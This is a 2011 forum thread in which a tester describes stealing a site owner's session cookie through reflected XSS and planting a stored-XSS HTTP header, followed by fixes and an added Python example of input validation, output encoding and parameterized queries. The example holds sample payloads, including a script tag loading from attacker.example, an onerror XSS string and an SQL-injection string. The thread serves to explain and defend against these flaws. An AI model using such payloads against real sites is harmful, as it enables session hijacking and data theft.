Alpha testers wanted

Re: Alpha testers wanted

Post by Goatboy on Mon Mar 07, 2011 6:00 pm

bombshop wrote:Wow that's nice work! Please let me understand, you could get the admin access while my cookie was valid or whenever you want? Thanks again, it is good to know that it is vulnerable :)

Only when your cookie (session) was valid, which I believe is 24 minutes after you log out, by default. Basically, the link I sent you caused a redirect to my site along with your cookie in the URL, which I then logged. My script then sent you back to your main page, making it look like a simple redirect bug in your site. The XSS was reflected back on the search page because your site echoes back whatever I search for, largely unfiltered. You did a good job escaping quotes, but because of browsers' tendencies to ignore bad markup, I was able to load an external script in a technically illegal way.

This is a good example of why defense-in-depth is a good idea. I would suggest filtering out any input that does not look like an IP address (there are tons of regex patterns for this), and HTML-encoding anything printed in the HTTP header results page. This second part is because even if the search error page is safe, the results may not be. I set up my page to deliver an XSS payload as its header, which I believe will be included in the results (and therefore the main page) when it is indexed.
Mundus Vult Decipi


Re: Alpha testers wanted

Post by bombshop on Tue Mar 08, 2011 2:08 am

Well, I guess it is not possible to execute XSS through the search script anymore. Of course, I will be happy to be proven wrong :)
As for the header info, that was what I had in mind since the beginning of coding. Even though I sanitized the input, it showed me that my sanitization was not enough. Well, it will be fixed in 5 minutes or something.


Re: Alpha testers wanted

Post by centip3de on Tue Mar 08, 2011 6:15 pm

Goatboy wrote:You are very vulnerable to both XSS and social engineering. The link I gave you was a cookie stealer. I promise I have not done anything malicious with this, but you should really look into it. I also entered my IP into the database with a custom HTTP header containing what will turn into a stored XSS attack if I am correct. Ciao.


Like a boss. 8-)
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook


Re: Alpha testers wanted

Post by bombshop on Thu Mar 10, 2011 8:54 am

Well, does anybody want to comment on the usage of the site?


Re: Alpha testers wanted

Post by Goatboy on Thu Mar 10, 2011 10:14 pm

I am pretty sure someone has done this before, but I couldn't easily find anything on Google. So the idea is solid, and if you can speed up the searches it might catch on in the long run. I'd suggest switching your search function to start with the exact IP that is given and then scan the rest of the range. This gets the desired result faster. Security is another issue, not only because of the XSS I demonstrated. Someone could also put a malicious SQL query into their header, which might be executed when scanned. I noticed that you escape characters for your search string, but not for HTTP headers.
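The three points raised in this thread (a search box that only escapes quotes, stored HTTP headers printed unencoded on the results page, and header values reaching the database unescaped) can all be shown with a small server-side model. The following is an added example, not code from bombshop's site or from any poster; the payloads, the table name `scans`, and the function names are constructed for illustration. It rejects anything that is not an IP literal before the search string is ever echoed, HTML-encodes recorded headers before printing them, and stores scanned headers with a parameterized query so a hostile header cannot alter the SQL:

```python
"""Added example (not the original site's code): strict IP validation for the
search box, HTML-encoding of recorded HTTP headers before display, and
parameterized storage of scanned headers.  All payloads are constructed."""
import html
import ipaddress
import sqlite3

# The defence the thread describes: quotes are escaped, nothing else.
def escape_quotes_only(s: str) -> str:
    return s.replace('"', "&quot;").replace("'", "&#39;")

# Constructed payload with no quotes at all.  Quote-escaping leaves it intact,
# and browsers accept an unquoted src attribute, so the external script loads.
NO_QUOTE_PAYLOAD = "<script src=//attacker.example/x.js></script>"

def validate_ip(query: str):
    """Return the normalised IP literal, or None if the query is not one.
    The thread suggests a regex; the stdlib parser does the same job and also
    rejects out-of-range octets such as 999.1.1.1.  Markup never reaches the
    page because the page only ever prints the value this function returns."""
    try:
        return str(ipaddress.ip_address(query.strip()))
    except ValueError:
        return None

def render_header_line(name: str, value: str) -> str:
    """HTML-encode a recorded header before it is printed in the results page.
    quote=True also encodes quotes, so the value is inert inside attributes."""
    return "<li>%s: %s</li>" % (html.escape(name, quote=True),
                                html.escape(value, quote=True))

def store_scan(conn: sqlite3.Connection, ip: str, headers: dict) -> None:
    """Record the headers a scanned host returned.  Placeholders keep header
    text as data, so a value like "'); DROP TABLE scans;--" is just a string."""
    conn.execute("CREATE TABLE IF NOT EXISTS scans (ip TEXT, name TEXT, value TEXT)")
    conn.executemany("INSERT INTO scans (ip, name, value) VALUES (?, ?, ?)",
                     [(ip, n, v) for n, v in headers.items()])
    conn.commit()

def rendered_results(conn: sqlite3.Connection, ip: str) -> str:
    rows = conn.execute("SELECT name, value FROM scans WHERE ip = ? ORDER BY name",
                        (ip,)).fetchall()
    return "\n".join(render_header_line(n, v) for n, v in rows)

def demo() -> dict:
    """Scan a constructed hostile host and render its results page."""
    conn = sqlite3.connect(":memory:")
    # Constructed headers as a hostile server (or a tester's custom header)
    # might return them: a stored-XSS attempt and an SQL-injection attempt.
    hostile_headers = {
        "Server": "Apache",
        "X-Powered-By": "<img src=x onerror=alert(1)>",
        "X-Note": "'); DROP TABLE scans;--",
    }
    store_scan(conn, "203.0.113.7", hostile_headers)
    page = rendered_results(conn, "203.0.113.7")
    rows = conn.execute("SELECT COUNT(*) FROM scans").fetchone()[0]
    return {"html": page, "rows": rows}

if __name__ == "__main__":
    print("quote-only escaping leaves:", escape_quotes_only(NO_QUOTE_PAYLOAD))
    print("validate_ip on payload:", validate_ip(NO_QUOTE_PAYLOAD))
    print(demo()["html"])
```

The search box and the results page are handled differently on purpose: the search value has a known shape, so it is validated and never echoed raw, while header values are free-form and can only be made safe by encoding at the point where they are printed. Both steps are needed; the stored header path is the one the thread's custom-header test targeted, and the database query is what turns the header into a second injection vector if it is built by string concatenation instead.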


Re: Alpha testers wanted

Post by bombshop on Mon Mar 14, 2011 2:23 am

Actually, I do escape the strings in the headers when recording. I also escape them while showing them. But I know it wouldn't hurt to check once more :)

-- Sat Mar 19, 2011 4:42 pm --

I am happy to announce that the crawling functionality is now somewhat automated. It is not fully automatic right now, but this is also good :)

